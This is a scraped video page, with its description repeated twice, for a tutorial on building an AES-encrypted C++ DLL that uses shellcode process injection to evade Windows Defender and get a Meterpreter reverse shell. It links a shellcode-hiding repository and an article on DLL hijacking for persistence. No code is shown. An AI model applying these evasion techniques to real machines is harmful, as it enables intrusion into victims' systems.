Be better than yesterday -
This video showcases how it was possible to modify several publicly available tools and customise a template C++ file that will perform shellcode process injection which bypasses Windows Defender, obtaining a fully functional reverse shell on a victim's Windows machine.
It was possible to generate a .DLL payload file with cross-compilation on a Kali machine that performs shellcode process injection with AES encryption by utilising references from a publicly available Github repository.
The video provides a step-by-step walkthrough guide and a practical demonstration on how you can generate a .DLL payload file in C++ that will achieve a Meterpreter reverse shell on a Windows machine that has Windows Defender running.
The video also provides a high-level explanation on why .DLL payload files are useful, and shares an article which discuss a practical use case referencing Microsoft Teams, whereby .DLL payload files can be leveraged for persistence and proxy execution.
Github repository reference:
https://github.com/TheD1rkMtr/Shellcode-Hide
Microsoft Teams article reference:
https://milosilo.com/hacking/microsoft-teams-proxy-dll-hijacking/#:~:text=DLL%20Hijacking%20using%20a%20proxy,commands%20to%20the%20intended%20dll.
Gemini Security Awesome Hacking T-Shirts - Support the channel:
https://www.redbubble.com/people/GeminiSecurity/shop?asc=u
This video showcases how it was possible to modify several publicly available tools and customise a template C++ file that will perform shellcode process injection which bypasses Windows Defender, obtaining a fully functional reverse shell on a victim's Windows machine.
It was possible to generate a .DLL payload file with cross-compilation on a Kali machine that performs shellcode process injection with AES encryption by utilising references from a publicly available Github repository.
The video provides a step-by-step walkthrough guide and a practical demonstration on how you can generate a .DLL payload file in C++ that will achieve a Meterpreter reverse shell on a Windows machine that has Windows Defender running.
The video also provides a high-level explanation on why .DLL payload files are useful, and shares an article which discuss a practical use case referencing Microsoft Teams, whereby .DLL payload files can be leveraged for persistence and proxy execution.
Github repository reference:
https://github.com/TheD1rkMtr/Shellcode-Hide
Microsoft Teams article reference:
https://milosilo.com/hacking/microsoft-teams-proxy-dll-hijacking/#:~:text=DLL%20Hijacking%20using%20a%20proxy,commands%20to%20the%20intended%20dll.
Gemini Security Awesome Hacking T-Shirts - Support the channel:
https://www.redbubble.com/people/GeminiSecurity/shop?asc=u
- Категория
- Язык программирования C++
Комментариев нет.
Следующее
Auto
-
10:55
Object Oriented Programming Part 3 || JAVA || Geek Payload
-
14:24
S.35 Objective C Defender - Warthunder
-
00:36
Battlefield 1: The Defender
-
00:38
Bash shell in Windows??
-
12:57
How to Run Java File in Windows Operating System
-
10:27
Malware Debugging: Persistent C++ Reverse Shell
-
21:52
How to Make Bgmi / any version bypass ( Bypass making C++ ) PART 1
-
10:54
JAVA shell Tool (REPL) in Java9 || Java Terminal Programming || Java Shell Programming || #359
-
26:11
Object Oriented Programming Part 1 || JAVA || Geek Payload
-
02:29
How to run a Java JAR file on Windows 10
-
01:04
Как добавить вибрацию при нажатии на кнопку (Swift 5, Xcode 13) / mrGURU
-
2:17:30
1. Разработка на Android. Введение | Технострим
-
22:17
![Android-разработка[8]. Работа с сетью](https://appdrafting.com/uploads/thumbs/c0b372616-1.jpg)
Android-разработка[8]. Работа с сетью
